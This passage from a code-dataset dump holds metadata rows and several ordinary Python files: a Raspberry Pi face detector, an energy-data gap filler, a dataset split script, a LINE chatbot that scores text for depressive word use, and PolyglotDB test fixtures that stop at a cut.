| 31.693333 | 86 | 0.619689 | 277 | 2,377 | 5.148014 | 0.375451 | 0.014025 | 0.042076 | 0.035764 | 0.091865 | 0.039271 | 0.039271 | 0 | 0 | 0 | 0 | 0.011021 | 0.274716 | 2,377 | 74 | 87 | 32.121622 | 0.816125 | 0.441313 | 0 | 0 | 0 | 0 | 0.119342 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.071429 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9ce2c37b0bb5981068f798cd85b5e4ebcafdcc4 | 1,011 | py | Python | openCv/script.py | tfrere/bras | fb7ae3720dd6bae0ccb3b3b5ec59ab18e760f48b | [
"Unlicense"
] | null | null | null | openCv/script.py | tfrere/bras | fb7ae3720dd6bae0ccb3b3b5ec59ab18e760f48b | [
"Unlicense"
] | null | null | null | openCv/script.py | tfrere/bras | fb7ae3720dd6bae0ccb3b3b5ec59ab18e760f48b | [
"Unlicense"
] | null | null | null | from picamera.array import PiRGBArray
from picamera import PiCamera
import time
import numpy as np
import cv2
import picamera.array
camera = PiCamera()
camera.resolution = (800, 600)
camera.framerate =10
rawCapture = PiRGBArray(camera, size=(800, 600))
time.sleep(0.1)
face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
eye_cascade = cv2.CascadeClassifier('haarcascade_eye.xml')
for frame in camera.capture_continuous(rawCapture, format="bgr", use_video_port=True):
img = frame.array
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray, 1.3, 5)
for (x,y,w,h) in faces:
img = cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),2)
roi_gray = gray[y:y+h, x:x+w]
roi_color = img[y:y+h, x:x+w]
eyes = eye_cascade.detectMultiScale(roi_gray)
for (ex,ey,ew,eh) in eyes:
cv2.rectangle(roi_color,(ex,ey),(ex+ew,ey+eh),(0,255,0),2)
cv2.imshow('img',img)
key = cv2.waitKey(1) & 0xFF
rawCapture.truncate(0)
if key == ord("q"):
break
| 25.275 | 86 | 0.71909 | 168 | 1,011 | 4.238095 | 0.422619 | 0.008427 | 0.075843 | 0.106742 | 0.016854 | 0.016854 | 0 | 0 | 0 | 0 | 0 | 0.049887 | 0.127596 | 1,011 | 39 | 87 | 25.923077 | 0.75737 | 0 | 0 | 0 | 0 | 0 | 0.060396 | 0.034653 | 0 | 0 | 0.00396 | 0 | 0 | 1 | 0 | false | 0 | 0.206897 | 0 | 0.206897 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9cedc2010c3c6ab49074b7411de9c5f5d16a0f4 | 3,801 | py | Python | data_processing/fill_missing_data.py | irasus-technologies/EnergyBoost | c5fcd4ed58aedffe0c3c71cdc76f860c64bb1de1 | [
"MIT"
] | null | null | null | data_processing/fill_missing_data.py | irasus-technologies/EnergyBoost | c5fcd4ed58aedffe0c3c71cdc76f860c64bb1de1 | [
"MIT"
] | null | null | null | data_processing/fill_missing_data.py | irasus-technologies/EnergyBoost | c5fcd4ed58aedffe0c3c71cdc76f860c64bb1de1 | [
"MIT"
] | null | null | null |
# coding: utf-8
# In[1]:
import pandas as pd
import numpy as np
from datetime import datetime
# In[2]:
hh_df = pd.read_csv('home_ac/processed_hhdata_86_2.csv')
# print(hh_df.shape)
# hh_df.head(15)
hh_df.drop_duplicates(subset ="localhour", keep = False, inplace = True)
print(hh_df.shape)
# In[3]:
hh_df['hour_index']=0
#hh_df.iloc[-50]
# In[4]:
used = ['localhour', 'use', 'temperature', 'cloud_cover','GH', 'is_weekday','month','hour','AC','DC','hour_index']
datarow= []
# In[5]:
hour_index=0#hour index
hour_value=0
missing_count=0
start_time= pd.to_datetime(hh_df['localhour'].iloc[0][:-3])
for index, row in hh_df.iterrows():
row.localhour=row.localhour[:-3]
#print(row.localhour)
difference=(pd.to_datetime(row.localhour)-pd.to_datetime(hh_df['localhour'].iloc[0][:-3])).total_seconds()/3600
#print("index is difference",difference)
if difference!=hour_index:
gap = difference-hour_index
missing_count += gap
#fill in the missing hours
for i in range(int(gap)):
print("\n---------------------------------------")
print("missing data for hour index:",hour_index+i)
#row.hour=(hour_index+i)%24
temprow=None
#print("this is lastrow",lastrow)
temprow=lastrow
#print("this is temprow",temprow)
temprow.hour_index=hour_index+i
#print("this is hour of lastrow",lastrow.hour)
#temprow.hour = (hour_index+i)%24
current_time = start_time+pd.Timedelta(hour_index+i,unit='h')
temprow.localhour = current_time
temprow.hour = current_time.hour
temprow.month = current_time.month
temprow.is_weekday = int(datetime.strptime(str(current_time), "%Y-%m-%d %H:%M:%S").weekday() < 5)
print("The inserted row is \n",temprow)
#datarow.append(row[used])
datarow.append(temprow[used])
temprow=None
#hour=None
#print(datarow)
hour_index = difference
hour_index +=1
row.hour_index=difference
#hour_value = row.hour
#print(row[used])
#print("reach here")
lastrow = row[used]
datarow.append(row[used])
print("total missing hours",missing_count)
#------------------------------------------testing----------------------------
# hour_index=0 #hour index
# missing_count=0
# for index, row in hh_df.iterrows():
# #print(row.localhour)
# #row.month = float(pd.to_datetime(row.localhour[:-3]).month)
# #row.day = float(pd.to_datetime(row.localhour[:-3]).day)
# #data_hour = float(pd.to_datetime(row.localhour).hour-6)%24
# data_hour = float(pd.to_datetime(row.localhour[:-3]).hour)
# #print(data_hour)
# if data_hour != hour_index%24:
# print("we are missing hours for",row.localhour)
# missing_count += 1
# hour_index +=1
# hour_index += 1
# print("In total missing hours", missing_count)
# for index, row in hh_df.iterrows():
# #row.month = float(pd.to_datetime(row.localhour[:-3]).month)
# #row.day = float(pd.to_datetime(row.localhour[:-3]).day)
# print("------------")
# print(row.localhour)
# print(float(pd.to_datetime(row.localhour).hour-6)%24)
# print(float(pd.to_datetime(row.localhour[:-3]).hour))
# # print(pd.to_datetime(row.localhour))
# # print(pd.to_datetime(row.localhour).tz_localize('UTC'))
# # print(pd.to_datetime(row.localhour).tz_localize('UTC').tz_convert('US/Central'))
# # print(pd.to_datetime(row.localhour[:-3]).tz_localize('US/Central'))
# # print(pd.to_datetime(row.localhour)-pd.Timedelta('06:00:00'))
# In[6]:
df = pd.DataFrame(data=datarow, columns=used)
print(df.head())
df.to_csv('datanew/afterfix6.csv')
| 29.465116 | 115 | 0.61247 | 524 | 3,801 | 4.290076 | 0.219466 | 0.084075 | 0.085409 | 0.093416 | 0.381228 | 0.307384 | 0.284698 | 0.269128 | 0.204626 | 0.072954 | 0 | 0.019685 | 0.198106 | 3,801 | 128 | 116 | 29.695313 | 0.717848 | 0.468824 | 0 | 0.047619 | 0 | 0 | 0.147692 | 0.048718 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.071429 | 0 | 0.071429 | 0.142857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9d05630a781b58d240403429a6be895d1c2a315 | 1,375 | py | Python | scripts/parse.py | yeshaokai/mmpose_for_maDLC | 84efe0ff00de3d916086c8c5579eae17c1ef43cb | [
"Apache-2.0"
] | 5 | 2022-01-13T15:06:45.000Z | 2022-01-28T19:39:54.000Z | scripts/parse.py | yeshaokai/mmpose_for_maDLC | 84efe0ff00de3d916086c8c5579eae17c1ef43cb | [
"Apache-2.0"
] | null | null | null | scripts/parse.py | yeshaokai/mmpose_for_maDLC | 84efe0ff00de3d916086c8c5579eae17c1ef43cb | [
"Apache-2.0"
] | 1 | 2022-01-13T11:46:55.000Z | 2022-01-13T11:46:55.000Z | import pandas as pd
import pickle
import json
def extract_uncropped_name(filename):
f = filename.split('/')[-1]
video_source = filename.split('/')[-2]
video_source = video_source.replace('_cropped','')
image_format = f.split('.')[-1]
image_prefix = f.split('c')[0]
new_name = video_source+'_'+image_prefix+'.'+image_format
return new_name
csv_path='CollectedData_Daniel.csv'
all_data = pd.read_csv(csv_path)
for shuffle in [0,1,2]:
docu_path = 'Documentation_data-MultiMouse_95shuffle{}.pickle'.format(shuffle)
f = open(docu_path,'rb')
a = pickle.load(f)
train_indices = a[1]
test_indices = a[2]
data = all_data.iloc[3:,0].to_numpy()
train_data = data[train_indices]
test_data = data[test_indices]
train_data_set = set()
test_data_set = set()
for e in test_data:
test_data_set.add(extract_uncropped_name(e))
for e in train_data:
train_data_set.add(extract_uncropped_name(e))
print ('train dataset')
#print (train_data_set)
print (len(train_data_set))
print ('test dataset')
#print (test_data_set)
print (len(test_data_set))
ret_obj = {}
ret_obj['train_data'] = list(train_data_set)
ret_obj['test_data'] = list(test_data_set)
with open('3mouse_shuffule{}.json'.format(shuffle),'w') as f:
json.dump(ret_obj,f)
| 21.825397 | 82 | 0.664 | 203 | 1,375 | 4.182266 | 0.320197 | 0.08245 | 0.070671 | 0.040047 | 0.073027 | 0.073027 | 0.073027 | 0 | 0 | 0 | 0 | 0.012704 | 0.198545 | 1,375 | 62 | 83 | 22.177419 | 0.757713 | 0.031273 | 0 | 0 | 0 | 0 | 0.116541 | 0.070677 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027027 | false | 0 | 0.081081 | 0 | 0.135135 | 0.108108 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9d0c58d713f7b758640446cf6d2d1ffe15cf420 | 6,766 | py | Python | Depression-Language-Evaluation/app.py | Melody-Lin/LokiHub | 349f087b9d3d9d3fd4117f6288b3524015702b77 | [
"MIT"
] | 17 | 2020-11-25T07:40:18.000Z | 2022-03-07T03:29:18.000Z | Depression-Language-Evaluation/app.py | Melody-Lin/LokiHub | 349f087b9d3d9d3fd4117f6288b3524015702b77 | [
"MIT"
] | 8 | 2020-12-18T13:23:59.000Z | 2021-10-03T21:41:50.000Z | Depression-Language-Evaluation/app.py | Melody-Lin/LokiHub | 349f087b9d3d9d3fd4117f6288b3524015702b77 | [
"MIT"
] | 43 | 2020-12-02T09:03:57.000Z | 2021-12-23T03:30:25.000Z | #!/usr/bin/env python
# -*- coding:utf-8 -*-
from flask import Flask, request, abort
from linebot import LineBotApi, WebhookHandler
from linebot.exceptions import InvalidSignatureError
from linebot.models import *
import json
from ArticutAPI import Articut
from decimal import Decimal, ROUND_HALF_UP
app = Flask(__name__)
# line bot info
with open("line_bot.json", encoding="utf-8") as f:
linebotDICT = json.loads(f.read())
line_bot_api = LineBotApi(linebotDICT["line_bot_api"])
handler = WebhookHandler(linebotDICT["handler"])
# articut info
with open("account.json", encoding="utf-8") as f:
accountDICT = json.loads(f.read())
articut = Articut(username=accountDICT["username"], apikey=accountDICT["apikey"])
# 代名詞
with open("Dict/pronoun.json", encoding="utf-8") as f:
pronounDICT = json.loads(f.read())
# 絕對性詞彙
with open("Dict/absolution.json", encoding="utf-8") as f:
absolutionDICT = json.loads(f.read())
# 負向詞彙
with open("Dict/negative.json", encoding="utf-8") as f:
negativeDICT = json.loads(f.read())
# 正向詞彙
with open("Dict/positive.json", encoding="utf-8") as f:
positiveDICT = json.loads(f.read())
# 其他代名詞詞彙
with open("Dict/other_pronoun.json", encoding="utf-8") as f:
otherpronounDICT = json.loads(f.read())
@app.route("/callback", methods=['POST'])
def callback():
# get X-Line-Signature header value
signature = request.headers['X-Line-Signature']
# get request body as text
body = request.get_data(as_text=True)
app.logger.info("Request body: " + body)
# handle webhook body
try:
handler.handle(body, signature)
except InvalidSignatureError:
abort(400)
return 'OK'
# 忽略的詞性
ignorance = ["FUNC_conjunction", "FUNC_degreeHead", "FUNC_determiner", "FUNC_inner", "FUNC_inter", "FUNC_modifierHead", "FUNC_negation", "ASPECT"]
# 憂鬱指數
index = 0
def wordExtractor(inputLIST, unify=True):
'''
配合 Articut() 的 .getNounStemLIST() 和 .getVerbStemLIST() …等功能,拋棄位置資訊,只抽出詞彙。
'''
resultLIST = []
for i in inputLIST:
if i == []:
pass
else:
for e in i:
resultLIST.append(e[-1])
if unify == True:
return sorted(list(set(resultLIST)))
else:
return sorted(resultLIST)
def MakePronoun(inputLIST, inputDICT):
global index
index = 0
first_person = 0
others = 0
dictLen = 0
for i in inputLIST:
if i in pronounDICT["first"]:
first_person += 1
#else:
#others += 1
inputDICT = inputDICT["result_obj"]
for i in range(len(inputDICT)):
for j in range(len(inputDICT[i])):
if inputDICT[i][j]["pos"] not in ignorance:
dictLen += 1
#if inputDICT[i][j]["text"] in otherpronounDICT["others"]:
#others += 1
msg = "[代名詞 使用情況]\n"
msg += ("第一人稱:" + str(first_person) + '\n')
#msg += ("其他人稱:" + str(others) + '\n')
if first_person > 1:
msg += ("第一人稱占比:" + str(Decimal(str((first_person/dictLen)*100)).quantize(Decimal('.00'), ROUND_HALF_UP)) + "%\n")
else:
first_person = 1
msg += ("第一人稱占比:" + str(Decimal(str((first_person/dictLen)*100)).quantize(Decimal('.00'), ROUND_HALF_UP)) + "%\n")
index += Decimal(str((first_person/dictLen)*25)).quantize(Decimal('.00'), ROUND_HALF_UP)
return msg
def MakeAbsolution(inputDICT):
global index
absolute = 0
dictLen = 0
inputDICT = inputDICT["result_obj"]
for i in range(len(inputDICT)):
for j in range(len(inputDICT[i])):
if inputDICT[i][j]["pos"] not in ignorance:
dictLen += 1
if inputDICT[i][j]["text"] in absolutionDICT["absolution"]:
absolute += 1
msg = "\n[絕對性詞彙 使用情況]\n"
msg += ("絕對性詞彙:" + str(absolute) + '\n')
msg += ("絕對性詞彙占比:" + str(Decimal(str((absolute/dictLen)*100)).quantize(Decimal('.00'), ROUND_HALF_UP))+ "%\n")
index += Decimal(str((absolute/dictLen)*54)).quantize(Decimal('.00'), ROUND_HALF_UP)
return msg
def MakeDepression(inputDICT):
global index
depress = 0
encourage = 0
dictLen = 0
inputDICT = inputDICT["result_obj"]
for i in range(len(inputDICT)):
for j in range(len(inputDICT[i])):
if inputDICT[i][j]["pos"] not in ignorance:
dictLen += 1
if inputDICT[i][j]["text"] in negativeDICT["negative"]:
depress += 1
elif inputDICT[i][j]["text"] in negativeDICT["death"]:
depress += 2
elif inputDICT[i][j]["text"] in negativeDICT["medicine"]:
depress += 2
elif inputDICT[i][j]["text"] in negativeDICT["disease"]:
depress += 2
#elif inputDICT[i][j]["text"] in positiveDICT["positive"]:
#encourage += 1
msg = "\n[負向詞彙 使用情況]\n"
msg += ("負向詞彙:" + str(depress) + '\n')
#msg += ("正向詞彙:" + str(encourage) + '\n')
msg += ("負向詞彙占比:" + str(Decimal(str((depress/dictLen)*100)).quantize(Decimal('.00'), ROUND_HALF_UP))+ "%\n")
#msg += ("正向詞彙占比:" + str(Decimal(str((encourage/dictLen)*100)).quantize(Decimal('.00'), ROUND_HALF_UP))+ "%")
index += Decimal(str((depress/dictLen)*21)).quantize(Decimal('.00'), ROUND_HALF_UP)
return msg
def MakeIndex():
global index
msg = "\n[憂鬱文本分析]\n"
msg += ("憂鬱指數:" + str(index) + '\n')
msg += ("提醒您:此工具的用途為分析有潛在憂鬱傾向的文本。若您的文本之憂鬱指數高於5.5,代表此文本與其他憂鬱文本的相似度較高。")
return msg
@handler.add(MessageEvent, message=TextMessage)
def handle_message(event):
inputSTR = event.message.text
# input userDefinedDict
mixedDICT = {**absolutionDICT, **negativeDICT, **positiveDICT, **otherpronounDICT}
with open("mixedDICT.json", mode="w", encoding="utf-8") as f:
json.dump(mixedDICT, f, ensure_ascii=False)
# parse with userDefinedDict
inputDICT = articut.parse(inputSTR, userDefinedDictFILE="./mixedDICT.json")
inputLIST = articut.getPersonLIST(inputDICT)
inputLIST = wordExtractor(inputLIST, unify=False)
PronounMsg = MakePronoun(inputLIST, inputDICT)
AbsolutionMsg = MakeAbsolution(inputDICT)
DepressionMsg = MakeDepression(inputDICT)
IndexMsg = MakeIndex()
ResultMsg = PronounMsg + AbsolutionMsg + DepressionMsg + IndexMsg
SendMsg=[TextSendMessage(text=ResultMsg)]
line_bot_api.reply_message(event.reply_token, SendMsg)
import os
if __name__ == "__main__":
port = int(os.environ.get('PORT', 5000))
app.run(host='0.0.0.0', port=port)
| 37.175824 | 147 | 0.60065 | 790 | 6,766 | 5.06962 | 0.258228 | 0.032459 | 0.027466 | 0.027965 | 0.30387 | 0.29563 | 0.259925 | 0.238702 | 0.221973 | 0.161798 | 0 | 0.016526 | 0.248744 | 6,766 | 181 | 148 | 37.381215 | 0.770805 | 0.096364 | 0 | 0.277372 | 0 | 0 | 0.118446 | 0.013915 | 0 | 0 | 0 | 0 | 0 | 1 | 0.051095 | false | 0.007299 | 0.058394 | 0 | 0.160584 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9d3366cae5cc9d2f3c4639160a38329df539f7f | 20,236 | py | Python | tests/conftest.py | msonderegger/PolyglotDB | 583fd8ec14c2e34807b45b9f15fa19cffa130bfa | [
"MIT"
] | null | null | null | tests/conftest.py | msonderegger/PolyglotDB | 583fd8ec14c2e34807b45b9f15fa19cffa130bfa | [
"MIT"
] | null | null | null | tests/conftest.py | msonderegger/PolyglotDB | 583fd8ec14c2e34807b45b9f15fa19cffa130bfa | [
"MIT"
] | null | null | null | import pytest
import os
import sys
from polyglotdb.io.types.parsing import (SegmentTier, OrthographyTier,
GroupingTier, TextOrthographyTier,
TranscriptionTier,
TextTranscriptionTier, TextMorphemeTier,
MorphemeTier)
from polyglotdb.io.parsers.base import BaseParser
from polyglotdb.io import (inspect_textgrid, inspect_fave, inspect_mfa, inspect_partitur)
from polyglotdb.corpus import CorpusContext
from polyglotdb.structure import Hierarchy
from polyglotdb.config import CorpusConfig
def pytest_addoption(parser):
parser.addoption("--skipacoustics", action="store_true",
help="skip acoustic tests")
@pytest.fixture(scope='session')
def test_dir():
base = os.path.dirname(os.path.abspath(__file__))
generated = os.path.join(base, 'data', 'generated')
if not os.path.exists(generated):
os.makedirs(generated)
return os.path.join(base, 'data') # was tests/data
@pytest.fixture(scope='session')
def buckeye_test_dir(test_dir):
return os.path.join(test_dir, 'buckeye')
@pytest.fixture(scope='session')
def results_test_dir(test_dir):
results = os.path.join(test_dir, 'generated', 'results')
os.makedirs(results, exist_ok=True)
return results
@pytest.fixture(scope='session')
def timit_test_dir(test_dir):
return os.path.join(test_dir, 'timit')
@pytest.fixture(scope='session')
def textgrid_test_dir(test_dir):
return os.path.join(test_dir, 'textgrids')
@pytest.fixture(scope='session')
def praatscript_test_dir(test_dir):
return os.path.join(test_dir, 'praat_scripts')
@pytest.fixture(scope='session')
def praatscript_test_dir(test_dir):
return os.path.join(test_dir, 'praat_scripts')
@pytest.fixture(scope='session')
def fave_test_dir(textgrid_test_dir):
return os.path.join(textgrid_test_dir, 'fave')
@pytest.fixture(scope='session')
def mfa_test_dir(textgrid_test_dir):
return os.path.join(textgrid_test_dir, 'mfa')
@pytest.fixture(scope='session')
def maus_test_dir(textgrid_test_dir):
return os.path.join(textgrid_test_dir, 'maus')
@pytest.fixture(scope='session')
def labbcat_test_dir(textgrid_test_dir):
return os.path.join(textgrid_test_dir, 'labbcat')
@pytest.fixture(scope='session')
def partitur_test_dir(test_dir):
return os.path.join(test_dir, 'partitur')
@pytest.fixture(scope='session')
def text_transcription_test_dir(test_dir):
return os.path.join(test_dir, 'text_transcription')
@pytest.fixture(scope='session')
def text_spelling_test_dir(test_dir):
return os.path.join(test_dir, 'text_spelling')
@pytest.fixture(scope='session')
def ilg_test_dir(test_dir):
return os.path.join(test_dir, 'ilg')
@pytest.fixture(scope='session')
def csv_test_dir(test_dir):
return os.path.join(test_dir, 'csv')
@pytest.fixture(scope='session')
def features_test_dir(test_dir):
return os.path.join(test_dir, 'features')
@pytest.fixture(scope='session')
def export_test_dir(test_dir):
path = os.path.join(test_dir, 'export')
if not os.path.exists(path):
os.makedirs(path)
return path
@pytest.fixture(scope='session')
def corpus_data_timed():
levels = [SegmentTier('label', 'phone'),
OrthographyTier('label', 'word'),
GroupingTier('line', 'line')]
phones = [('k', 0.0, 0.1), ('ae', 0.1, 0.2), ('t', 0.2, 0.3), ('s', 0.3, 0.4),
('aa', 0.5, 0.6), ('r', 0.6, 0.7),
('k', 0.8, 0.9), ('uw', 0.9, 1.0), ('t', 1.0, 1.1),
('d', 2.0, 2.1), ('aa', 2.1, 2.2), ('g', 2.2, 2.3), ('z', 2.3, 2.4),
('aa', 2.4, 2.5), ('r', 2.5, 2.6),
('t', 2.6, 2.7), ('uw', 2.7, 2.8),
('ay', 3.0, 3.1),
('g', 3.3, 3.4), ('eh', 3.4, 3.5), ('s', 3.5, 3.6)]
words = [('cats', 0.0, 0.4), ('are', 0.5, 0.7), ('cute', 0.8, 1.1),
('dogs', 2.0, 2.4), ('are', 2.4, 2.6), ('too', 2.6, 2.8),
('i', 3.0, 3.1), ('guess', 3.3, 3.6)]
lines = [(0.0, 1.1), (2.0, 2.8), (3.0, 3.6)]
levels[0].add(phones)
levels[1].add(words)
levels[2].add(lines)
hierarchy = Hierarchy({'phone': 'word', 'word': 'line', 'line': None})
parser = BaseParser(levels, hierarchy)
data = parser.parse_discourse('test_timed')
return data
@pytest.fixture(scope='session')
def subannotation_data():
levels = [SegmentTier('label', 'phone'),
OrthographyTier('label', 'word'),
OrthographyTier('stop_information', 'phone')]
levels[2].subannotation = True
phones = [('k', 0.0, 0.1), ('ae', 0.1, 0.2), ('t', 0.2, 0.3), ('s', 0.3, 0.4),
('aa', 0.5, 0.6), ('r', 0.6, 0.7),
('k', 0.8, 0.9), ('u', 0.9, 1.0), ('t', 1.0, 1.1),
('d', 2.0, 2.1), ('aa', 2.1, 2.2), ('g', 2.2, 2.3), ('z', 2.3, 2.4),
('aa', 2.4, 2.5), ('r', 2.5, 2.6),
('t', 2.6, 2.7), ('uw', 2.7, 2.8),
('ay', 3.0, 3.1),
('g', 3.3, 3.4), ('eh', 3.4, 3.5), ('s', 3.5, 3.6)]
words = [('cats', 0.0, 0.4), ('are', 0.5, 0.7), ('cute', 0.8, 1.1),
('dogs', 2.0, 2.4), ('are', 2.4, 2.6), ('too', 2.6, 2.8),
('i', 3.0, 3.1), ('guess', 3.3, 3.6)]
info = [('burst', 0, 0.05), ('vot', 0.05, 0.1), ('closure', 0.2, 0.25),
('burst', 0.25, 0.26), ('vot', 0.26, 0.3), ('closure', 2.2, 2.25),
('burst', 2.25, 2.26), ('vot', 2.26, 2.3),
('voicing_during_closure', 2.2, 2.23), ('voicing_during_closure', 2.24, 2.25)]
levels[0].add(phones)
levels[1].add(words)
levels[2].add(info)
hierarchy = Hierarchy({'phone': 'word', 'word': None})
parser = BaseParser(levels, hierarchy)
data = parser.parse_discourse('test_sub')
return data
@pytest.fixture(scope='session')
def corpus_data_onespeaker(corpus_data_timed):
for k in corpus_data_timed.data.keys():
corpus_data_timed.data[k].speaker = 'some_speaker'
return corpus_data_timed
@pytest.fixture(scope='session')
def corpus_data_untimed():
levels = [TextTranscriptionTier('transcription', 'word'),
TextOrthographyTier('spelling', 'word'),
TextMorphemeTier('morpheme', 'word'),
GroupingTier('line', 'line')]
transcriptions = [('k.ae.t-s', 0), ('aa.r', 1), ('k.y.uw.t', 2),
('d.aa.g-z', 3), ('aa.r', 4), ('t.uw', 5),
('ay', 6), ('g.eh.s', 7)]
morphemes = [('cat-PL', 0), ('are', 1), ('cute', 2),
('dog-PL', 3), ('are', 4), ('too', 5),
('i', 6), ('guess', 7)]
words = [('cats', 0), ('are', 1), ('cute', 2),
('dogs', 3), ('are', 4), ('too', 5),
('i', 6), ('guess', 7)]
lines = [(0, 2), (3, 5), (6, 7)]
levels[0].add(transcriptions)
levels[1].add(words)
levels[2].add(morphemes)
levels[3].add(lines)
hierarchy = Hierarchy({'word': 'line', 'line': None})
parser = BaseParser(levels, hierarchy)
data = parser.parse_discourse('test_untimed')
return data
@pytest.fixture(scope='session')
def corpus_data_ur_sr():
levels = [SegmentTier('sr', 'phone'),
OrthographyTier('word', 'word'),
TranscriptionTier('ur', 'word')]
srs = [('k', 0.0, 0.1), ('ae', 0.1, 0.2), ('s', 0.2, 0.4),
('aa', 0.5, 0.6), ('r', 0.6, 0.7),
('k', 0.8, 0.9), ('u', 0.9, 1.1),
('d', 2.0, 2.1), ('aa', 2.1, 2.2), ('g', 2.2, 2.25),
('ah', 2.25, 2.3), ('z', 2.3, 2.4),
('aa', 2.4, 2.5), ('r', 2.5, 2.6),
('t', 2.6, 2.7), ('uw', 2.7, 2.8),
('ay', 3.0, 3.1),
('g', 3.3, 3.4), ('eh', 3.4, 3.5), ('s', 3.5, 3.6)]
words = [('cats', 0.0, 0.4), ('are', 0.5, 0.7), ('cute', 0.8, 1.1),
('dogs', 2.0, 2.4), ('are', 2.4, 2.6), ('too', 2.6, 2.8),
('i', 3.0, 3.1), ('guess', 3.3, 3.6)]
urs = [('k.ae.t.s', 0.0, 0.4), ('aa.r', 0.5, 0.7), ('k.y.uw.t', 0.8, 1.1),
('d.aa.g.z', 2.0, 2.4), ('aa.r', 2.4, 2.6), ('t.uw', .6, 2.8),
('ay', 3.0, 3.1), ('g.eh.s', 3.3, 3.6)]
levels[0].add(srs)
levels[1].add(words)
levels[2].add(urs)
hierarchy = Hierarchy({'phone': 'word', 'word': None})
parser = BaseParser(levels, hierarchy)
data = parser.parse_discourse('test_ursr')
return data
@pytest.fixture(scope='session')
def lexicon_data():
corpus_data = [{'spelling': 'atema', 'transcription': ['ɑ', 't', 'e', 'm', 'ɑ'], 'frequency': 11.0},
{'spelling': 'enuta', 'transcription': ['e', 'n', 'u', 't', 'ɑ'], 'frequency': 11.0},
{'spelling': 'mashomisi', 'transcription': ['m', 'ɑ', 'ʃ', 'o', 'm', 'i', 's', 'i'],
'frequency': 5.0},
{'spelling': 'mata', 'transcription': ['m', 'ɑ', 't', 'ɑ'], 'frequency': 2.0},
{'spelling': 'nata', 'transcription': ['n', 'ɑ', 't', 'ɑ'], 'frequency': 2.0},
{'spelling': 'sasi', 'transcription': ['s', 'ɑ', 's', 'i'], 'frequency': 139.0},
{'spelling': 'shashi', 'transcription': ['ʃ', 'ɑ', 'ʃ', 'i'], 'frequency': 43.0},
{'spelling': 'shisata', 'transcription': ['ʃ', 'i', 's', 'ɑ', 't', 'ɑ'], 'frequency': 3.0},
{'spelling': 'shushoma', 'transcription': ['ʃ', 'u', 'ʃ', 'o', 'm', 'ɑ'], 'frequency': 126.0},
{'spelling': 'ta', 'transcription': ['t', 'ɑ'], 'frequency': 67.0},
{'spelling': 'tatomi', 'transcription': ['t', 'ɑ', 't', 'o', 'm', 'i'], 'frequency': 7.0},
{'spelling': 'tishenishu', 'transcription': ['t', 'i', 'ʃ', 'e', 'n', 'i', 'ʃ', 'u'],
'frequency': 96.0},
{'spelling': 'toni', 'transcription': ['t', 'o', 'n', 'i'], 'frequency': 33.0},
{'spelling': 'tusa', 'transcription': ['t', 'u', 's', 'ɑ'], 'frequency': 32.0},
{'spelling': 'ʃi', 'transcription': ['ʃ', 'i'], 'frequency': 2.0}]
return corpus_data
@pytest.fixture(scope='session')
def corpus_data_syllable_morpheme_srur():
levels = [SegmentTier('sr', 'phone', label=True),
TranscriptionTier('ur', 'word'),
GroupingTier('syllable', 'syllable'),
MorphemeTier('morphemes', 'word'),
OrthographyTier('word', 'word'),
GroupingTier('line', 'line')]
srs = [('b', 0, 0.1), ('aa', 0.1, 0.2), ('k', 0.2, 0.3), ('s', 0.3, 0.4),
('ah', 0.4, 0.5), ('s', 0.5, 0.6),
('er', 0.7, 0.8),
('f', 0.9, 1.0), ('er', 1.0, 1.1),
('p', 1.2, 1.3), ('ae', 1.3, 1.4), ('k', 1.4, 1.5), ('eng', 1.5, 1.6)]
urs = [('b.aa.k.s-ah.z', 0, 0.6), ('aa.r', 0.7, 0.8),
('f.ao.r', 0.9, 1.1), ('p.ae.k-ih.ng', 1.2, 1.6)]
syllables = [(0, 0.3), (0.3, 0.6), (0.7, 0.8), (0.9, 1.1),
(1.2, 1.5), (1.5, 1.6)]
morphemes = [('box-PL', 0, 0.6), ('are', 0.7, 0.8),
('for', 0.9, 1.1), ('pack-PROG', 1.2, 1.6)]
words = [('boxes', 0, 0.6), ('are', 0.7, 0.8),
('for', 0.9, 1.1), ('packing', 1.2, 1.6)]
lines = [(0, 1.6)]
levels[0].add(srs)
levels[1].add(urs)
levels[2].add(syllables)
levels[3].add(morphemes)
levels[4].add(words)
levels[5].add(lines)
hierarchy = Hierarchy({'phone': 'syllable', 'syllable': 'word',
'word': 'line', 'line': None})
parser = BaseParser(levels, hierarchy)
data = parser.parse_discourse('test_syllable_morpheme')
return data
@pytest.fixture(scope='session')
def graph_db():
